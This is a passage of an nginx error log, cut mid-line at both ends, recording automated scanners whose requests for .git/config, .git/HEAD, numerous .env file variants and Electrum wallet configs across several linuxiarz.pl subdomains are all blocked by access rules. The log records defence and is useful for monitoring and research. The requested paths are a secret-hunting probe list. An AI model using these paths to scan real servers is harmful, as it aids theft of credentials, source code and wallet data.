HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/02/22 05:29:21 [error] 3860623#3860623: *57398 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2023/02/22 18:19:17 [error] 3860623#3860623: *65390 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/apache2_2-4-39-linuxiarz.pl/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian_8/apache2_2-4-39-linuxiarz.pl/.git/HEAD" +2023/02/22 18:19:51 [error] 3860623#3860623: *65394 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian_8/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian_8/.git/HEAD" +2023/02/22 18:20:19 [error] 3860623#3860623: *65398 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_16.04_LTS/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu_16.04_LTS/.git/HEAD" +2023/02/22 18:20:34 [error] 3860623#3860623: *65400 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_15.10/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu_15.10/.git/HEAD" +2023/02/22 18:20:49 [error] 3860623#3860623: *65405 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu_14.04_LTS/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu_14.04_LTS/.git/HEAD" +2023/02/22 18:21:03 [error] 3860623#3860623: *65407 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2015.04/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu%2015.04/.git/HEAD" +2023/02/22 18:21:36 [error] 3860623#3860623: *65409 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2014.04%20LTS/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu%2014.04%20LTS/.git/HEAD" +2023/02/22 18:22:08 [error] 3860623#3860623: *65411 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian_9/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian_9/.git/HEAD" +2023/02/22 18:22:42 [error] 3860623#3860623: *65414 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian_7/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian_7/.git/HEAD" +2023/02/22 18:23:15 [error] 3860623#3860623: *65418 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Debian%207/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Debian%207/.git/HEAD" +2023/03/03 00:15:52 [error] 3860623#3860623: *185248 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/06 21:42:43 [error] 3860623#3860623: *347654 access forbidden by rule, client: 3.75.170.117, server: kodi.linuxiarz.pl, request: "GET /.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "http://kodi.linuxiarz.pl/.git/HEAD" +2023/03/06 21:43:22 [error] 3860623#3860623: *347721 access forbidden by rule, client: 3.75.170.117, server: kodi.linuxiarz.pl, request: "GET /kodi_19/.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "http://kodi.linuxiarz.pl/kodi_19/.git/HEAD" +2023/03/06 21:43:58 [error] 3860623#3860623: *347777 access forbidden by rule, client: 3.75.170.117, server: kodi.linuxiarz.pl, request: "GET /9.80/.git/HEAD HTTP/1.1", host: "kodi.linuxiarz.pl", referrer: "http://kodi.linuxiarz.pl/9.80/.git/HEAD" +2023/03/07 08:27:24 [error] 3860623#3860623: *357664 access forbidden by rule, client: 3.124.3.208, server: pliki.linuxiarz.pl, request: "GET /02-2016/.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/03/11 06:33:07 [error] 2572177#2572177: *57637 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:08 [error] 2572177#2572177: *57638 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.dev HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:10 [error] 2572177#2572177: *57640 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /core/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:12 [error] 2572177#2572177: *57642 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.dev.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:13 [error] 2572177#2572177: *57643 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.development.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:14 [error] 2572177#2572177: *57644 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.prod HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:15 [error] 2572177#2572177: *57645 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.prod.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:16 [error] 2572177#2572177: *57646 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.production HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:17 [error] 2572177#2572177: *57647 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.production.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:20 [error] 2572177#2572177: *57648 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.local HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:29 [error] 2572177#2572177: *57649 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.example HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:33 [error] 2572177#2572177: *57660 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.stage HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:36 [error] 2572177#2572177: *57661 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.live HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:39 [error] 2572177#2572177: *57662 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.backup HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:33:58 [error] 2572177#2572177: *57684 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.save.1 HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:11 [error] 2572177#2572177: *57686 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.www HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:11 [error] 2572177#2572177: *57685 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.old HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:18 [error] 2572177#2572177: *57687 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env_1 HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:19 [error] 2572177#2572177: *57688 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env_sample HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:20 [error] 2572177#2572177: *57690 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.linuxiarz HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:20 [error] 2572177#2572177: *57692 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.env.kompilacje HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:21 [error] 2572177#2572177: *57696 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /api/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:22 [error] 2572177#2572177: *57702 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /laravel/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:24 [error] 2572177#2572177: *57703 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /demo/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:26 [error] 2572177#2572177: *57704 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /web/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:34:52 [error] 2572177#2572177: *57706 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /public/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:08 [error] 2572177#2572177: *57707 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /conf/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:16 [error] 2572177#2572177: *57708 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /library/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:22 [error] 2572177#2572177: *57709 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /new/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:30 [error] 2572177#2572177: *57716 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /old/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:31 [error] 2572177#2572177: *57717 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /local/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:32 [error] 2572177#2572177: *57718 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /blog/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:34 [error] 2572177#2572177: *57719 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /crm/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:36 [error] 2572177#2572177: *57720 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /admin/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:38 [error] 2572177#2572177: *57721 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /app/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:40 [error] 2572177#2572177: *57722 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /app/config/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:42 [error] 2572177#2572177: *57723 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /apps/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:43 [error] 2572177#2572177: *57724 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /audio/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:46 [error] 2572177#2572177: *57725 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /backend/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:47 [error] 2572177#2572177: *57726 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /application/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:49 [error] 2572177#2572177: *57727 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /prod/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:50 [error] 2572177#2572177: *57728 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /docs/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:53 [error] 2572177#2572177: *57729 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /sites/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:54 [error] 2572177#2572177: *57730 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /docker/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:55 [error] 2572177#2572177: *57737 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /sendgrid/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:57 [error] 2572177#2572177: *57738 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /laravel/core/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:35:58 [error] 2572177#2572177: *57739 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /beta/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:00 [error] 2572177#2572177: *57740 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /config/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:02 [error] 2572177#2572177: *57741 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /kyc/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:04 [error] 2572177#2572177: *57742 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /tokenlite_app/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:06 [error] 2572177#2572177: *57743 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /dev/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:08 [error] 2572177#2572177: *57744 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /test/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:10 [error] 2572177#2572177: *57745 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /portal/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:12 [error] 2572177#2572177: *57746 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /live/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:14 [error] 2572177#2572177: *57747 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /current/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:16 [error] 2572177#2572177: *57748 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /develop/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:18 [error] 2572177#2572177: *57749 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /development/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:20 [error] 2572177#2572177: *57750 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /website/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:22 [error] 2572177#2572177: *57751 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /market/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:24 [error] 2572177#2572177: *57752 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /marketing/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:26 [error] 2572177#2572177: *57753 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /shop/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:28 [error] 2572177#2572177: *57754 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /wallet/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:30 [error] 2572177#2572177: *57755 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /server/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:32 [error] 2572177#2572177: *57756 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /.vscode/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:34 [error] 2572177#2572177: *57757 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /protected/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:36 [error] 2572177#2572177: *57758 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /lib/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:38 [error] 2572177#2572177: *57759 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /lab/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:40 [error] 2572177#2572177: *57760 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /cronlab/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:42 [error] 2572177#2572177: *57761 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /cron/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:44 [error] 2572177#2572177: *57762 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /core/app/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:46 [error] 2572177#2572177: *57763 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /core/Datavase/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:48 [error] 2572177#2572177: *57764 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /database/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:50 [error] 2572177#2572177: *57765 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /assets/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:52 [error] 2572177#2572177: *57766 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /uploads/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/03/11 06:36:54 [error] 2572177#2572177: *57767 access forbidden by rule, client: 45.61.187.81, server: kompilacje.linuxiarz.pl, request: "GET /sitemaps/.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/04/04 19:27:34 [error] 2572177#2572177: *535846 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/04/04 19:27:34 [error] 2572177#2572177: *535851 access forbidden by rule, client: 164.92.155.72, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/.git/config" +2023/04/04 19:27:36 [error] 2572177#2572177: *535854 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/04/04 19:27:36 [error] 2572177#2572177: *535857 access forbidden by rule, client: 164.92.155.72, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.git/config" +2023/04/04 19:27:36 [error] 2572177#2572177: *535858 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/04/04 19:27:37 [error] 2572177#2572177: *535860 access forbidden by rule, client: 164.92.155.72, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.git/config" +2023/04/06 22:10:25 [error] 2572177#2572177: *566394 access forbidden by rule, client: 193.189.100.202, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/08 18:20:56 [error] 2572177#2572177: *598568 access forbidden by rule, client: 185.220.103.120, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/08 19:15:17 [error] 2572177#2572177: *599361 access forbidden by rule, client: 185.220.101.38, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/09 04:25:52 [error] 2572177#2572177: *607474 access forbidden by rule, client: 185.220.101.39, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/09 05:10:43 [error] 2572177#2572177: *607992 access forbidden by rule, client: 178.20.55.16, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/09 11:51:48 [error] 2572177#2572177: *611138 access forbidden by rule, client: 192.42.116.178, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/09 12:37:33 [error] 2572177#2572177: *611471 access forbidden by rule, client: 185.220.101.149, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/09 20:38:24 [error] 2572177#2572177: *616101 access forbidden by rule, client: 192.42.116.175, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/09 22:34:43 [error] 2572177#2572177: *617767 access forbidden by rule, client: 23.129.64.228, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/10 16:50:57 [error] 2572177#2572177: *629517 access forbidden by rule, client: 78.142.18.219, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/10 20:01:06 [error] 2572177#2572177: *632534 access forbidden by rule, client: 185.220.101.153, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/11 23:56:09 [error] 2572177#2572177: *653542 access forbidden by rule, client: 162.247.74.201, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/12 03:07:25 [error] 2572177#2572177: *655036 access forbidden by rule, client: 192.42.116.193, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/13 07:01:22 [error] 2572177#2572177: *672137 access forbidden by rule, client: 185.220.101.32, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/13 10:15:55 [error] 2572177#2572177: *679628 access forbidden by rule, client: 2.58.56.101, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/13 19:09:03 [error] 2572177#2572177: *687011 access forbidden by rule, client: 109.237.97.227, server: kompilacje.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/04/13 20:24:07 [error] 2572177#2572177: *689622 access forbidden by rule, client: 109.237.97.227, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/04/15 02:36:29 [error] 2572177#2572177: *707893 access forbidden by rule, client: 104.244.73.193, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/15 07:12:26 [error] 2572177#2572177: *709607 access forbidden by rule, client: 185.56.83.83, server: kompilacje.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/.electrum/config" +2023/04/17 13:56:24 [error] 2572177#2572177: *752881 access forbidden by rule, client: 192.42.116.185, server: nginx.linuxiarz.pl, request: "GET /.electrum/config HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/.electrum/config" +2023/04/29 16:53:20 [error] 2065721#2065721: *70766 access forbidden by rule, client: 51.83.248.38, server: pliki.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/04/29 16:53:20 [error] 2065721#2065721: *70768 access forbidden by rule, client: 51.83.248.38, server: nginx.linuxiarz.pl, request: "GET /.env HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/05/22 09:14:47 [error] 183060#183060: *194083 access forbidden by rule, client: 179.43.180.18, server: pliki.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "pliki.linuxiarz.pl" +2023/05/23 03:44:36 [error] 183060#183060: *207509 access forbidden by rule, client: 179.43.180.18, server: nginx.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "nginx.linuxiarz.pl" +2023/05/23 12:00:17 [error] 183060#183060: *211124 access forbidden by rule, client: 179.43.180.18, server: kompilacje.linuxiarz.pl, request: "GET /.git/config HTTP/1.1", host: "kompilacje.linuxiarz.pl" +2023/05/25 01:55:44 [error] 183060#183060: *236903 access forbidden by rule, client: 3.72.74.40, server: pliki.linuxiarz.pl, request: "GET /05-2016/.git/HEAD HTTP/1.1", host: "pliki.linuxiarz.pl", referrer: "http://pliki.linuxiarz.pl/05-2016/.git/HEAD" +2023/05/29 01:48:20 [error] 3237345#3237345: *17935 access forbidden by rule, client: 3.72.74.40, server: kompilacje.linuxiarz.pl, request: "GET /Ubuntu%2015.04/nginx-1.8.0-ubuntu-pagespeed/.git/HEAD HTTP/1.1", host: "kompilacje.linuxiarz.pl", referrer: "http://kompilacje.linuxiarz.pl/Ubuntu%2015.04/nginx-1.8.0-ubuntu-pagespeed/.git/HEAD" +2023/05/31 22:10:42 [error] 3237345#3237345: *55892 access forbidden by rule, client: 3.70.222.50, server: nginx.linuxiarz.pl, request: "GET /ubuntu/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/ubuntu/.git/HEAD" +2023/05/31 22:10:57 [error] 3237345#3237345: *55895 access forbidden by rule, client: 3.70.222.50, server: nginx.linuxiarz.pl, request: "GET /opensuse/.git/HEAD HTTP/1.1", host: "nginx.linuxiarz.pl", referrer: "http://nginx.linuxiarz.pl/opensuse/.git/HEAD" +2023/05/31 22:11:13 [error] 3237345#3237345: *55897 access forbidden by rule, client: 3.70.222.50, server: 